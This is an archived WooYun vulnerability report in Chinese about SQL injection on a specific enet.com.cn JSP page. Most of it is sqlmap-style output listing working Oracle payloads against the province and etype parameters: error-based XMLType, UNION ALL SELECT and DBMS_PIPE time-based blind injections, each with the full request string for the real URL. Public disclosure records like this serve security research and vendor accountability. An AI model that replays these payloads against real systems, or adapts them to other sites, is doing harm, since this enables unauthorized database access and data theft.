乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-30: 细节已通知厂商并且等待厂商处理中 2015-08-04: 厂商已经主动忽略漏洞,细节向公众公开
硅谷动力某处SQL时间盲注
http://www.enet.com.cn/enews/inforcenter/itdate/fitdate.jsp?province=&etype=&fromyear=200其中fromyear=存在时间盲注跑下
Place: POSTParameter: etype Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: province=&etype=' AND 8797=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(97)||CHR(105)||CHR(121)||CHR(58)||(SELECT (CASE WHEN (8797=8797) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(102)||CHR(108)||CHR(108)||CHR(58)||CHR(62))) FROM DUAL) AND 'HPbf'='HPbf&fromyear=200 Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: province=&etype=' UNION ALL SELECT NULL,NULL,NULL,CHR(58)||CHR(97)||CHR(105)||CHR(121)||CHR(58)||CHR(66)||CHR(72)||CHR(83)||CHR(72)||CHR(101)||CHR(97)||CHR(77)||CHR(121)||CHR(115)||CHR(110)||CHR(58)||CHR(102)||CHR(108)||CHR(108)||CHR(58),NULL FROM DUAL-- &fromyear=200 Type: AND/OR time-based blind Title: Oracle OR time-based blind Payload: province=&etype=-2167' OR 9487=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(102)||CHR(115)||CHR(75),5) AND 'Nlvw'='Nlvw&fromyear=200Place: POSTParameter: province Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: province=' AND 7837=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(97)||CHR(105)||CHR(121)||CHR(58)||(SELECT (CASE WHEN (7837=7837) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(102)||CHR(108)||CHR(108)||CHR(58)||CHR(62))) FROM DUAL) AND 'SlMJ'='SlMJ&etype=&fromyear=200 Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: province=' UNION ALL SELECT NULL,NULL,NULL,CHR(58)||CHR(97)||CHR(105)||CHR(121)||CHR(58)||CHR(89)||CHR(99)||CHR(82)||CHR(105)||CHR(108)||CHR(69)||CHR(113)||CHR(119)||CHR(84)||CHR(103)||CHR(58)||CHR(102)||CHR(108)||CHR(108)||CHR(58),NULL FROM DUAL-- &etype=&fromyear=200 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: province=' AND 2030=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(65)||CHR(68)||CHR(67),5) AND 'DZsv'='DZsv&etype=&fromyear=200
http://www.enet.com.cn/enews/inforcenter/itdate/fitdate.jsp?province=&etype=&fromyear=200
危害等级:无影响厂商忽略
忽略时间:2015-08-04 19:32
漏洞Rank:4 (WooYun评价)
暂无